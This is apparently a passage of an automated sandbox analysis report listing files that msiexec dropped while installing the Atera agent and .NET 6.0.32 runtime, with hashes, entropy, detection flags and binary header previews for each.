                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: x64;1033, Revision Number: {911E9E2F-B38D-4D02-A148-5E49FC9D8943}, Create Time/Date: Wed Feb 28 10:52:04 2024, Last Saved Time/Date: Wed Feb 28 10:52:04 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2994176
                                                                                                                                                                                                                                        Entropy (8bit):7.878630966889847
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:s+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oq1xMbY+K/tzQz:s+lUlz9FKbsodq0YaH7Z1xMb8tT
                                                                                                                                                                                                                                        MD5:5E90226ABB5A004B0B9DB9A9E67BAC21
                                                                                                                                                                                                                                        SHA1:34EB703055BAFA469A714F18C7F00E5098B764AF
                                                                                                                                                                                                                                        SHA-256:BE0C53481ED4CF3EC4D0AD16053CD18D6AAD8C349B8281F5F9B90B526420CEAE
                                                                                                                                                                                                                                        SHA-512:2676357D10AA76F09F2A1F691C7566D54E34B20716EDF1301B2D69C3E3400D0A70E7C1738AEA9A75334B384AB988CEA3A07B983C900AE32395285BE61673C288
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\4c999d.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: x64;1033, Revision Number: {911E9E2F-B38D-4D02-A148-5E49FC9D8943}, Create Time/Date: Wed Feb 28 10:52:04 2024, Last Saved Time/Date: Wed Feb 28 10:52:04 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2994176
                                                                                                                                                                                                                                        Entropy (8bit):7.878630966889847
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:s+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oq1xMbY+K/tzQz:s+lUlz9FKbsodq0YaH7Z1xMb8tT
                                                                                                                                                                                                                                        MD5:5E90226ABB5A004B0B9DB9A9E67BAC21
                                                                                                                                                                                                                                        SHA1:34EB703055BAFA469A714F18C7F00E5098B764AF
                                                                                                                                                                                                                                        SHA-256:BE0C53481ED4CF3EC4D0AD16053CD18D6AAD8C349B8281F5F9B90B526420CEAE
                                                                                                                                                                                                                                        SHA-512:2676357D10AA76F09F2A1F691C7566D54E34B20716EDF1301B2D69C3E3400D0A70E7C1738AEA9A75334B384AB988CEA3A07B983C900AE32395285BE61673C288
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\4c999e.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Runtime - 6.0.32 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Runtime - 6.0.32 (x64)., Template: x64;1033, Revision Number: {81A6B662-3AB0-42DC-AE22-74E8036F80FA}, Create Time/Date: Sun Jun 16 06:00:54 2024, Last Saved Time/Date: Sun Jun 16 06:00:54 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27222016
                                                                                                                                                                                                                                        Entropy (8bit):7.99350983480325
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:786432:xUjjZm/yN+5DsfeR/WZGvLF3bApyMYhKj:xS4/yN+NsG/WZQF3EpJYhK
                                                                                                                                                                                                                                        MD5:4E9EB394F40E78755FA76E67F9190CD0
                                                                                                                                                                                                                                        SHA1:36310C7F007992D911E8402E4AA34A2BB1682063
                                                                                                                                                                                                                                        SHA-256:8701E309396C5232A4FE1606C6E3549134FE01DC0D9FE4A74CB9D26531DDD9A4
                                                                                                                                                                                                                                        SHA-512:2CB71F44E7BBA16143120512718DD128185A5063BA4767146D10C93B81B6CAA4226CFC30FA44B1E50EE41C37B55852E32EA63554FD438FB9ED60DE2CE93CA8E3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\4c99a1.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Runtime - 6.0.32 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Runtime - 6.0.32 (x64)., Template: x64;1033, Revision Number: {81A6B662-3AB0-42DC-AE22-74E8036F80FA}, Create Time/Date: Sun Jun 16 06:00:54 2024, Last Saved Time/Date: Sun Jun 16 06:00:54 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27222016
                                                                                                                                                                                                                                        Entropy (8bit):7.99350983480325
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:786432:xUjjZm/yN+5DsfeR/WZGvLF3bApyMYhKj:xS4/yN+NsG/WZQF3EpJYhK
                                                                                                                                                                                                                                        MD5:4E9EB394F40E78755FA76E67F9190CD0
                                                                                                                                                                                                                                        SHA1:36310C7F007992D911E8402E4AA34A2BB1682063
                                                                                                                                                                                                                                        SHA-256:8701E309396C5232A4FE1606C6E3549134FE01DC0D9FE4A74CB9D26531DDD9A4
                                                                                                                                                                                                                                        SHA-512:2CB71F44E7BBA16143120512718DD128185A5063BA4767146D10C93B81B6CAA4226CFC30FA44B1E50EE41C37B55852E32EA63554FD438FB9ED60DE2CE93CA8E3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\4c99a2.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Host FX Resolver - 6.0.32 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Host FX Resolver - 6.0.32 (x64)., Template: x64;1033, Revision Number: {43DA5864-E85C-44A5-B8EC-4BB554FA8AFC}, Create Time/Date: Sun Jun 16 06:00:06 2024, Last Saved Time/Date: Sun Jun 16 06:00:06 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):876544
                                                                                                                                                                                                                                        Entropy (8bit):6.767183882536547
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:219IeVsJxYRR3cqU8VKIvZUlkj/cBhZeK4lu/XdmYwh:2jIxCMHWvZgkjcDefMFmL
                                                                                                                                                                                                                                        MD5:46DB6C104F1B633927DEE575B5C38C0B
                                                                                                                                                                                                                                        SHA1:9D5E6CF836E28959181B855102E70F5A37550314
                                                                                                                                                                                                                                        SHA-256:2C8DFB556F4A6576205AF03F8D5E2F0A939395CA2DE6D69F06478B3008D1A2CE
                                                                                                                                                                                                                                        SHA-512:007877E08B1958FDC5FEC7DA9FE8AD1A678C2E59BF0B5F4B4080640C1FAB96A34F27AF81F5A733580E95B897D0E27E1C1FD45A4CA20A673A20F3331F3D5C2B62
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\4c99a5.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Host FX Resolver - 6.0.32 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Host FX Resolver - 6.0.32 (x64)., Template: x64;1033, Revision Number: {43DA5864-E85C-44A5-B8EC-4BB554FA8AFC}, Create Time/Date: Sun Jun 16 06:00:06 2024, Last Saved Time/Date: Sun Jun 16 06:00:06 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):876544
                                                                                                                                                                                                                                        Entropy (8bit):6.767183882536547
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:219IeVsJxYRR3cqU8VKIvZUlkj/cBhZeK4lu/XdmYwh:2jIxCMHWvZgkjcDefMFmL
                                                                                                                                                                                                                                        MD5:46DB6C104F1B633927DEE575B5C38C0B
                                                                                                                                                                                                                                        SHA1:9D5E6CF836E28959181B855102E70F5A37550314
                                                                                                                                                                                                                                        SHA-256:2C8DFB556F4A6576205AF03F8D5E2F0A939395CA2DE6D69F06478B3008D1A2CE
                                                                                                                                                                                                                                        SHA-512:007877E08B1958FDC5FEC7DA9FE8AD1A678C2E59BF0B5F4B4080640C1FAB96A34F27AF81F5A733580E95B897D0E27E1C1FD45A4CA20A673A20F3331F3D5C2B62
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\4c99a6.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Host - 6.0.32 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Host - 6.0.32 (x64)., Template: x64;1033, Revision Number: {6CC46603-A43D-40BF-9045-9949A2B95632}, Create Time/Date: Sun Jun 16 05:59:54 2024, Last Saved Time/Date: Sun Jun 16 05:59:54 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):811008
                                                                                                                                                                                                                                        Entropy (8bit):6.573482407139199
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:7hdTmeBQqU8VKIvZUlkj/cBhZeK4lu/XdmYwc:SQQHWvZgkjcDefMFm+
                                                                                                                                                                                                                                        MD5:AC53C5D5E2F1E2CCFD83408856CE81DB
                                                                                                                                                                                                                                        SHA1:14F67D98612AAD86C092DD05200B21A4FDFB8E1C
                                                                                                                                                                                                                                        SHA-256:756C0D73225DA2A0DA97C879E00F6D5B273A0078D0BAB55EB52755B449D1A896
                                                                                                                                                                                                                                        SHA-512:0FAB821D87FD7DAAB480DB7BF54F0A51A73A16E91440D7EA440A56F6BB3D177105BF1E0741F7D4B94D206F6152104F7B35456AE1F1054B6F679FF0A126588454
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\4c99a9.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Host - 6.0.32 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Host - 6.0.32 (x64)., Template: x64;1033, Revision Number: {6CC46603-A43D-40BF-9045-9949A2B95632}, Create Time/Date: Sun Jun 16 05:59:54 2024, Last Saved Time/Date: Sun Jun 16 05:59:54 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):811008
                                                                                                                                                                                                                                        Entropy (8bit):6.573482407139199
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:7hdTmeBQqU8VKIvZUlkj/cBhZeK4lu/XdmYwc:SQQHWvZgkjcDefMFm+
                                                                                                                                                                                                                                        MD5:AC53C5D5E2F1E2CCFD83408856CE81DB
                                                                                                                                                                                                                                        SHA1:14F67D98612AAD86C092DD05200B21A4FDFB8E1C
                                                                                                                                                                                                                                        SHA-256:756C0D73225DA2A0DA97C879E00F6D5B273A0078D0BAB55EB52755B449D1A896
                                                                                                                                                                                                                                        SHA-512:0FAB821D87FD7DAAB480DB7BF54F0A51A73A16E91440D7EA440A56F6BB3D177105BF1E0741F7D4B94D206F6152104F7B35456AE1F1054B6F679FF0A126588454
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI1C9.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):437217
                                                                                                                                                                                                                                        Entropy (8bit):6.647821387664616
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:Et3jOZy2KsGU6a4Kspt3jOZy2KsGU6a4Ks2:0zOE2Z34K+zOE2Z34Kz
                                                                                                                                                                                                                                        MD5:BB58915DFAC275346D2F7FABE7B96392
                                                                                                                                                                                                                                        SHA1:9855D7D6ED94B396F3357590B16AAD4215150FF2
                                                                                                                                                                                                                                        SHA-256:7CA12CFA96B9CD8E25A947D592FA584E5FD096B753D51FEF322D2AF0AE0810A8
                                                                                                                                                                                                                                        SHA-512:18DAE9F6EDED1C4DB3B2E29F0E90ECF9D36B799358348AF5B4D9093FCC834D0B1E5A8C92E292A7027783C717377A0DB889F08525A15EDFE1B1AC74B2F0574F6A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI1C9.tmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@iOBY.@.....@.....@.....@.....@.....@......&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}..AteraAgent..ateraAgentSetup64_1_8_7_2.msi.@.....@.....@.....@........&.{911E9E2F-B38D-4D02-A148-5E49FC9D8943}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[....

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI1CA.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI28DE.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):250736
                                                                                                                                                                                                                                        Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                        MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                        SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                        SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                        SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x.....V...V...V:i.W...V:i.WR..V.q.W...V.q.W...V.q.W...V:i.W...V:i.W...V:i.W...V...V&..Vup.W...Vup.W...VupFV...V...V...Vup.W...VRich...V................PE..L......e...........!.....<...X......Q........P...........................................@..........................G.......L..........x............|..pW...........<..T............................<..@............P..0............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data...4$...`.......N..............@....rsrc...x............X..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI2B50.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):84904
                                                                                                                                                                                                                                        Entropy (8bit):5.647792800664189
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:NW7nUIYEPaPQ1rAEIeJU8Zg65Q+fUQxs+RQdBKvlH0Vjqgg1bcdv4Yu8EB5vv49P:M7BQG+u1E
                                                                                                                                                                                                                                        MD5:1132B3050D7D700099E820D0F45F3817
                                                                                                                                                                                                                                        SHA1:E383BD62D69A798997AD0C4822415C8E62AFA50E
                                                                                                                                                                                                                                        SHA-256:A4A9FF70B5AD3559251A22BEC3716F18223C59787CCC833D9EC743F263AB431F
                                                                                                                                                                                                                                        SHA-512:5295DCCD48C060E4857B8DE3614CD2C95A40CE09FBFB0168481FD3B86652149C0A5BB8EA9CAFE1A1B413DC829F277B01C274B7AE87A6C83DCB5BF22C7364C12D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@oOBY.@.....@.....@.....@.....@.....@......&.{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}%.Microsoft .NET Runtime - 6.0.32 (x64)!.dotnet-runtime-6.0.32-win-x64.msi.@.....@gA.0.@.....@........&.{81A6B662-3AB0-42DC-AE22-74E8036F80FA}.....@.....@.....@.....@.......@.....@.....@.......@....%.Microsoft .NET Runtime - 6.0.32 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{3B053811-15BE-513E-9DEC-B2B5C4918267}S.02:\Software\Classes\Installer\Dependencies\dotnet_runtime_48.128.16743_x64\Version.@.......@.....@.....@......&.{12C6BE75-4A6B-5D0E-8906-981484BEDEFB}D.C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\.version.@.......@.....@.....@......&.{5B8B7A30-DD32-5F3F-BF38-4CDA80FF7B58}^.C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-console-l1-1-0.dll.@.......@.....@.....@......&.{2D57BD37-A665-5E90-A9

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI3FD.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI48B.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI64A0.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):250736
                                                                                                                                                                                                                                        Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                        MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                        SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                        SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                        SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x.....V...V...V:i.W...V:i.WR..V.q.W...V.q.W...V.q.W...V:i.W...V:i.W...V:i.W...V...V&..Vup.W...Vup.W...VupFV...V...V...Vup.W...VRich...V................PE..L......e...........!.....<...X......Q........P...........................................@..........................G.......L..........x............|..pW...........<..T............................<..@............P..0............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data...4$...`.......N..............@....rsrc...x............X..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI66C4.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):250736
